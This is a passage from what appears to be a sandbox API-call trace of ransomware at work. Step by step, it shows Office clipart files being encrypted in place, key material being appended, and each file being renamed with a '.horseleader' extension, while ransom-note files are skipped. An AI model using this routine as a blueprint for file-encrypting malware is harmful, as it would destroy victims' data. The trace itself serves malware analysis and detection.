files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.137] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 67 [0254.137] StrStrW (lpFirst="DD01140_.WMF", lpSrch=".txt") returned 0x0 [0254.137] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3616) returned 1 [0254.137] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xe20, lpOverlapped=0x0) returned 1 [0254.154] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff1e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.154] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xe20, lpOverlapped=0x0) returned 1 [0254.154] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.155] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.155] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.155] CloseHandle (hObject=0x158) returned 1 [0254.155] GetProcessHeap () returned 0x780000 [0254.155] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.155] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.horseleader") returned 79 [0254.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.horseleader")) returned 1 [0254.157] GetProcessHeap () returned 0x780000 [0254.158] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.158] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x85c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01143_.WMF", cAlternateFileName="")) returned 1 [0254.158] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="Windows") returned -1 [0254.158] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 67 [0254.158] StrStrIW (lpFirst="DD01143_.WMF", lpSrch=".horseleader") returned 0x0 [0254.158] lstrcmpW (lpString1="DD01143_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.158] lstrcmpW (lpString1="DD01143_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.158] lstrlenW (lpString=".testttjffg") returned 11 [0254.158] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.159] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.159] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.159] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.160] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 67 [0254.160] StrStrW (lpFirst="DD01143_.WMF", lpSrch=".txt") returned 0x0 [0254.160] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2140) returned 1 [0254.160] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x85c, lpOverlapped=0x0) returned 1 [0254.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7a4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.193] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x85c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x85c, lpOverlapped=0x0) returned 1 [0254.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.194] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.194] CloseHandle (hObject=0x158) returned 1 [0254.194] GetProcessHeap () returned 0x780000 [0254.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.194] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.horseleader") returned 79 [0254.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.horseleader")) returned 1 [0254.196] GetProcessHeap () returned 0x780000 [0254.196] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.196] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xadc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01145_.WMF", cAlternateFileName="")) returned 1 [0254.196] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="Windows") returned -1 [0254.196] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 67 [0254.196] StrStrIW (lpFirst="DD01145_.WMF", lpSrch=".horseleader") returned 0x0 [0254.196] lstrcmpW (lpString1="DD01145_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.196] lstrcmpW (lpString1="DD01145_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.196] lstrlenW (lpString=".testttjffg") returned 11 [0254.196] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.196] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.196] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 67 [0254.198] StrStrW (lpFirst="DD01145_.WMF", lpSrch=".txt") returned 0x0 [0254.198] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2780) returned 1 [0254.198] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xadc, lpOverlapped=0x0) returned 1 [0254.200] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff524, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.200] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xadc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xadc, lpOverlapped=0x0) returned 1 [0254.200] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.200] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.200] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.201] CloseHandle (hObject=0x158) returned 1 [0254.201] GetProcessHeap () returned 0x780000 [0254.201] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.201] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.horseleader") returned 79 [0254.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf.horseleader")) returned 1 [0254.202] GetProcessHeap () returned 0x780000 [0254.202] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.202] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01146_.WMF", cAlternateFileName="")) returned 1 [0254.202] lstrcmpiW (lpString1="DD01146_.WMF", lpString2="Windows") returned -1 [0254.202] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 67 [0254.202] StrStrIW (lpFirst="DD01146_.WMF", lpSrch=".horseleader") returned 0x0 [0254.202] lstrcmpW (lpString1="DD01146_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.202] lstrcmpW (lpString1="DD01146_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.202] lstrlenW (lpString=".testttjffg") returned 11 [0254.202] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.202] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.203] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.203] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.203] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 67 [0254.203] StrStrW (lpFirst="DD01146_.WMF", lpSrch=".txt") returned 0x0 [0254.203] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2796) returned 1 [0254.204] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xaec, lpOverlapped=0x0) returned 1 [0254.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff514, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.206] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xaec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xaec, lpOverlapped=0x0) returned 1 [0254.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.206] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.206] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.206] CloseHandle (hObject=0x158) returned 1 [0254.206] GetProcessHeap () returned 0x780000 [0254.206] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.206] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.horseleader") returned 79 [0254.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.horseleader")) returned 1 [0254.208] GetProcessHeap () returned 0x780000 [0254.208] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.208] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01151_.WMF", cAlternateFileName="")) returned 1 [0254.208] lstrcmpiW (lpString1="DD01151_.WMF", lpString2="Windows") returned -1 [0254.208] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 67 [0254.208] StrStrIW (lpFirst="DD01151_.WMF", lpSrch=".horseleader") returned 0x0 [0254.208] lstrcmpW (lpString1="DD01151_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.208] lstrcmpW (lpString1="DD01151_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.208] lstrlenW (lpString=".testttjffg") returned 11 [0254.208] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.208] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.208] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.209] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.209] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 67 [0254.210] StrStrW (lpFirst="DD01151_.WMF", lpSrch=".txt") returned 0x0 [0254.210] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2960) returned 1 [0254.210] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb90, lpOverlapped=0x0) returned 1 [0254.213] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff470, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.213] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb90, lpOverlapped=0x0) returned 1 [0254.214] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.214] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.214] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.214] CloseHandle (hObject=0x158) returned 1 [0254.214] GetProcessHeap () returned 0x780000 [0254.214] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.214] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.horseleader") returned 79 [0254.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.horseleader")) returned 1 [0254.216] GetProcessHeap () returned 0x780000 [0254.216] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.216] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01152_.WMF", cAlternateFileName="")) returned 1 [0254.216] lstrcmpiW (lpString1="DD01152_.WMF", lpString2="Windows") returned -1 [0254.216] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 67 [0254.216] StrStrIW (lpFirst="DD01152_.WMF", lpSrch=".horseleader") returned 0x0 [0254.216] lstrcmpW (lpString1="DD01152_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.216] lstrcmpW (lpString1="DD01152_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.216] lstrlenW (lpString=".testttjffg") returned 11 [0254.216] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.216] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.216] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.217] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 67 [0254.217] StrStrW (lpFirst="DD01152_.WMF", lpSrch=".txt") returned 0x0 [0254.217] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2960) returned 1 [0254.217] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb90, lpOverlapped=0x0) returned 1 [0254.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff470, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.239] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb90, lpOverlapped=0x0) returned 1 [0254.240] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.240] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.240] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.240] CloseHandle (hObject=0x158) returned 1 [0254.240] GetProcessHeap () returned 0x780000 [0254.240] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.240] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.horseleader") returned 79 [0254.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.horseleader")) returned 1 [0254.242] GetProcessHeap () returned 0x780000 